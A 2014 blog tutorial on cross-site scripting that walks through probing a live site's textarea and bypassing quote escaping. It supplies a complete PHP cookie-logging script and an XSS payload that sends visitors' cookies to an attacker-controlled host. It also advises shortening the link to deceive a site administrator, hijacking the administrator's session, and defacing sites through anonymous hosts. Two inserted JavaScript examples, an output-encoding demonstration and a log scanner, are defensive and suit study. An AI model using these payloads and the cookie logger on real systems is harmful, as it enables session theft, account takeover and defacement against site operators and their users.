Friday, February 14, 2014

XSS Tutorial with Pictures and Detailed Version






What is XSS?


[*]"XSS" is short for "Cross Site Scripting". As you can see by the name, XSS
deals with scripting, to be more exact: JavaScript.
It's about injecting (almost) any JavaScript (and HTML/CSS)
command or script into a website.
XSS flaws come up every time a website doesn't filter the attacker's input.
In other words:
the attacker can inject his malicious script into a website, and the browser just
runs the code or script.

What is HTML?


[*]HyperText Markup Language (HTML) is the main markup language for creating web pages and other information that can be displayed in a web browser.


What is JavaScript?


[*]JavaScript (JS) is an interpreted computer programming language. As part of web browsers, implementations allow client-side scripts to interact with the user, control the browser, communicate asynchronously, and alter the document content that is displayed. It has also become common in server-side programming, game development and the creation of desktop applications.

Difference between Java & Javascript


[*]Java is an OOP programming language while JavaScript is an OOP scripting language.
Java creates applications that run in a virtual machine or browser while JavaScript code runs in a browser only.
Java code needs to be compiled while JavaScript code is all plain text.
They require different plug-ins.

Types of XSS:


[*]Reflected or Non-persistent XSS Attack:
When an attacker injects his malicious script into a search query, a search box,
or the end of a URL, it's called a Reflected XSS attack. It's like throwing a ball
against a wall and getting it back.

[*]Stored or Persistent XSS Attack:
This is when an injected XSS script is stored permanently on a website, for example in
a guestbook or bulletin board. Stored XSS hits everyone who simply visits the
page with the malicious code.

[*]Traditional versus DOM-based vulnerabilities
This is a rarely used method. Traditionally, cross-site scripting vulnerabilities would occur in server-side code responsible for preparing the HTML response to be served to the user. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.

We need some background knowledge before attempting to perform an XSS attack; that's why I made the listing above.


How can we find websites vulnerable to XSS?

[*]Google Dorks
[*]Web vulnerability scanners
[*]Manually

[*] Google Dorks:

Code:
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

[*] Web vulnerability scanners:

Code:
Acunetix
Skipfish
OWASP Zap
Nessus , etc

[*] Manually, which I am going to explain to you now.


You don't need to add random vectors to the search box or whatever it is; you just need to analyze the source code.
So.. can we have a look inside the code and see what the hell is going on there?

YES!

So I will show you guys how to analyze the source code and manipulate that damn alert box to fuckin' prompt.

Ok, this is my input box where I will insert:

Code:
dR.0xYw0Rm


[Image: tutorial1_zps3d773bc7.png]


Let's click get source and have a look at what's happening inside the source code..

[Image: tutorial2_zpseebb546e.png]


Code:
<textarea cols="80" rows="20" name="headers">dR.0xYw0Rm</textarea>

Hmmm.. let's try to close the </textarea> tag like this:
Code:
</textarea>dR.0xYw0Rm
[Image: tutorial3_zps165854c8.png]

Let's go again inside the source code and check..

[Image: tutorial4_zps90ba9937.png]

So as we can see now the source code has changed from:
Code:
dR.0xYw0Rm</textarea>
to
Code:
</textarea>dR.0xYw0Rm

Which means that we have closed the textarea tag and can try to insert our evil code.. Let's have a look at the page... do you see any difference?
[Image: tutorial5_zpsd7d8a00b.png]


Ok, the dR.0xYw0Rm ended up outside the box :'( :P

Let's try to insert the JavaScript code now
Code:
<script>alert("dR.0xYw0Rm")</script>

[Image: tutorial6_zps3518ede8.png]


No box prompted? Let's check the source code:

[Image: tutorial7_zpscebf3ab5.png]


Code:
<textarea cols="80" rows="20" name="headers"></textarea><script>alert(\"dR.0xYw0Rm\")</script>

Damn, the quotes -> " <- got escaped with a backslash..

There are many different filters that don't allow the box to prompt.
Can we do something to bypass them?!

DAMN YEAH!!!

Ok, now we are going to convert our text to ASCII character codes with a JavaScript function called String.fromCharCode


Code:
</textarea><script>alert(String.fromCharCode(100,82,46,48,120,89,119,48,82,109))</script>

Don't feel confused!
The numbers below are the ASCII values for dR.0xYw0Rm

Code:
100,82,46,48,120,89,119,48,82,109

So our code doesn't contain quotes anymore. :dance:

Let's insert it into the box

[Image: tutorial8_zps3078f5b9.png]


Let's click "get source" to execute the code,

then open it in a new window.
[Image: tutorial9_zpsb15e1982.png]


So here it is!! We got the alert box, which means that the target is vulnerable to XSS!!!

This is the proper way to check for XSS vulnerabilities on websites.
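As an added illustration (not part of the original tutorial), the snippet below models the reflected textarea from the screenshots in JavaScript and shows why the backslash-escaping seen in the page source only broke the first payload, while proper HTML entity encoding stops both payloads from closing the textarea at all. The template string, the `addslashes`/`htmlEncode` names and the `analyse` helper are this example's own.

```javascript
// Added example (not from the tutorial): model the target page's textarea reflection
// and compare the weak magic_quotes-style treatment with proper HTML encoding.

// What magic_quotes_gpc / addslashes() does: backslash-escape quotes and backslashes,
// leave < > & untouched. This produces the \" seen in the tutorial's page source.
function addslashes(input) {
  return input.replace(/([\\'"])/g, '\\$1');
}

// The actual fix: entity-encode the characters that are significant in HTML text
// content (what PHP's htmlspecialchars($s, ENT_QUOTES) does).
function htmlEncode(input) {
  return input
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// The response template seen in the tutorial's "get source" screenshots.
function render(value) {
  return '<textarea cols="80" rows="20" name="headers">' + value + '</textarea>';
}

// A <textarea> is RCDATA: everything is text until the first literal "</textarea>"
// (case-insensitive). If that token appears inside the reflected value the element
// closes early and what follows is parsed as live markup: the break-out in the
// screenshots.
function analyse(input, filter) {
  const value = filter(input);
  const html = render(value);
  const lower = html.toLowerCase();
  const bodyStart = html.indexOf('>') + 1;          // first char after the opening tag
  const firstClose = lower.indexOf('</textarea>');
  const breaksOut = firstClose < bodyStart + value.length;
  // Markup the browser would execute rather than display as text.
  const liveMarkup = breaksOut
    ? html.slice(firstClose + '</textarea>'.length, lower.lastIndexOf('</textarea>'))
    : '';
  return { html, breaksOut, liveMarkup };
}

// Would the injected script body even parse? With addslashes the \" makes it a
// SyntaxError, which is why the tutorial saw no alert box at that step.
function scriptParses(liveMarkup) {
  const m = /<script>([\s\S]*?)<\/script>/i.exec(liveMarkup);
  if (!m) return false;
  try { new Function(m[1]); return true; } catch (e) { return false; }
}

// The two payloads used in the tutorial.
const QUOTED = '</textarea><script>alert("dR.0xYw0Rm")</script>';
const CHARCODE = '</textarea><script>alert(String.fromCharCode(100,82,46,48,120,89,119,48,82,109))</script>';

for (const [name, filter] of [['addslashes', addslashes], ['htmlEncode', htmlEncode]]) {
  for (const payload of [QUOTED, CHARCODE]) {
    const r = analyse(payload, filter);
    console.log(name, 'breaks out:', r.breaksOut, r.breaksOut ? 'script parses: ' + scriptParses(r.liveMarkup) : '');
  }
}
```

Entity encoding is the right treatment for this context (text inside an element); a value placed inside a script block or an event-handler attribute needs the encoding for that context instead.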



XSS Advanced Methods

Now I will share with you guys some ways to use XSS against a target.

KEEP IN MIND THAT FOR ANYTHING EVIL YOU DO TO A TARGET, YOU CAN END UP IN REALLY BIG TROUBLE!! SO ANYTHING YOU DO, YOU DO ON YOUR OWN; THIS IS JUST FOR EDUCATIONAL & INFORMATIONAL PURPOSES!!!


Cookie Stealing


[*]Cookie stealing is the most dangerous attack we can do with a non-persistent XSS; it will log the cookies of every user who accesses the page to a certain file.

Now I am going to explain to you step by step how to do this.

First we need to find a hosting website; personally I suggest you use 000webhost.com for uploading malicious code or anything else. So let's open an account there.
Now once we have created our site, let's go to File Manager, create a new file and rename it CookieLog.txt.
Leave that file blank, don't put anything inside. Now create another file called CookieLogger.php.
In this file we have to add some code so it will log the cookies it receives into CookieLog.txt.
So add the code below to CookieLogger.php, and don't forget to give it the .php extension, otherwise it won't work!


Code:
<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./CookieLog.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +  // Numeric
  "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
  "abcdefghijklmnopqrstuvwxyz" +
  "-_.!~*'()";  // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
  var ch = plaintext.charAt(i);
  if (ch == " ") {
    encoded += "+";    // x-www-urlencoded, rather than %20
  } else if (SAFECHARS.indexOf(ch) != -1) {
    encoded += ch;
  } else {
    var charCode = ch.charCodeAt(0);
    if (charCode > 255) {
    alert( "Unicode Character '"
    + ch
    + "' cannot be encoded using standard URL encoding.\n" +
    "(URL encoding only supports 8-bit characters.)\n" +
    "A space (+) will be substituted." );
    encoded += "+";
    } else {
    encoded += "%";
    encoded += HEX.charAt((charCode >> 4) & 0xF);
    encoded += HEX.charAt(charCode & 0xF);
    }
  }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

<?php
}
?>

Now that we have our cookie logger, we have to send it to the victim, which will be the website administrator.
To make the URL less suspicious we need to shorten it with TinyURL.
Let's go to tinyurl.com and paste in the URL, but don't forget to add the script at the end of the URL,
and then shorten it!


This is the script:
Code:
<script>document.location="http://www.myhost.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

Once you get the cookie, you can use the Firefox addon called "Cookie Manager" to manipulate or edit the cookie so you can hijack the administrator session.

DEFACING


In order to deface a website with XSS you need to find a persistent XSS.
You can use the script below to redirect the visitors to your deface page. I suggest you use
pastehtml[dot]com as it allows anonymous uploading.

Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACE/";</script>


XSS Filter Bypassing Methods:



[*]ASCII Bypassing
[*]Hex Bypassing
[*]Case Sensitive


[*]ASCII Bypassing when magic_quotes_gpc=ON

It causes every " (double quote), ' (single quote), and \ (backslash)
to be escaped with a backslash automatically.

How to bypass it?

Use the JavaScript function called

Code:
String.fromCharCode()
Just convert your text to decimal character codes, as I showed you guys when we were performing the "attack".

[*]Hex Bypassing

We encode our script in hex so that at first glance you can't clearly see what the code will do.

The text:

Code:
<script>alert(dR.0xYw0Rm)</script>

How to bypass it?

The text hex encoded:
Code:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%52%2e%30%78%59%77%30%52%6d%29%3c%2f%73%63%72%69%70%74%3e


[*]Case Sensitive Bypassing

This kind of bypass works only on really old & stupid filters, but it's always worth a try!
All we need to do is execute the script with characters of mixed case.

How to bypass it?


Code:
<sCrIpT>alert('dR.0xYw0Rm');</ScRiPt>
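The same three variants from the defender's side, as an added example that is not part of the tutorial: a detection routine has to percent-decode, expand String.fromCharCode literals and lower-case a request before matching, or each variant above slips past a plain string comparison. The access-log lines are constructed, and `percentDecodeFully`, `expandFromCharCode`, `scanLine` and `INDICATORS` are names chosen here.

```javascript
// Added example (not from the tutorial): normalise request data before matching so
// the percent-hex, mixed-case and fromCharCode variants above all reduce to the same
// indicator. The access-log lines below are constructed for this example.

// Percent-decode repeatedly until stable (catches %253c double encoding) and return
// what we have if a malformed sequence throws.
function percentDecodeFully(s) {
  let current = s;
  for (let i = 0; i < 5; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { return current; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Replace String.fromCharCode(n, n, ...) literals with the text they build, so an
// analyst reads "dR.0xYw0Rm" instead of a list of numbers.
function expandFromCharCode(s) {
  return s.replace(/String\.fromCharCode\(\s*([\d\s,]+?)\s*\)/gi, (m, list) => {
    const codes = list.split(',').map(n => n.trim()).filter(Boolean).map(Number);
    return '"' + String.fromCharCode(...codes) + '"';
  });
}

// Indicators taken from the tutorial's own payloads; compared against the decoded,
// lower-cased form only, never against the raw line.
const INDICATORS = ['<script', '</textarea>', 'document.cookie', 'document.location', 'window.location'];

function scanLine(line) {
  const decoded = expandFromCharCode(percentDecodeFully(line));
  const lowered = decoded.toLowerCase();
  return { line, decoded, hits: INDICATORS.filter(ind => lowered.includes(ind)) };
}

function scanLog(lines) {
  return lines.map(scanLine).filter(r => r.hits.length > 0);
}

// Constructed access-log lines: one benign search, then the tutorial's three variants
// (percent-hex, mixed case, and the fromCharCode payload double-encoded).
const SAMPLE_LOG = [
  '10.0.0.5 - - [14/Feb/2014:10:00:01 +0000] "GET /search.php?q=cross+site+scripting HTTP/1.1" 200 512',
  '10.0.0.9 - - [14/Feb/2014:10:00:07 +0000] "GET /search.php?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%52%2e%30%78%59%77%30%52%6d%29%3c%2f%73%63%72%69%70%74%3e HTTP/1.1" 200 640',
  '10.0.0.9 - - [14/Feb/2014:10:00:12 +0000] "GET /search.php?q=%3CsCrIpT%3Ealert(%27dR.0xYw0Rm%27);%3C/ScRiPt%3E HTTP/1.1" 200 640',
  '10.0.0.9 - - [14/Feb/2014:10:00:20 +0000] "GET /search.php?q=%253C%252Ftextarea%253E%253Cscript%253Ealert(String.fromCharCode(100,82,46,48,120,89,119,48,82,109))%253C%252Fscript%253E HTTP/1.1" 200 640',
];

for (const r of scanLog(SAMPLE_LOG)) {
  console.log(r.hits.join(', '), '=>', r.decoded);
}
```

Indicator matching like this is triage for logs and alerts; the fix that makes all three variants irrelevant is encoding the output, not a longer blacklist.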

I hope I clarified what XSS is and how it works; if you need help, don't hesitate to comment here.

This tutorial was written entirely by one of my friends, dr. Woxyworm, && Anonleet gives a big thanks to him.
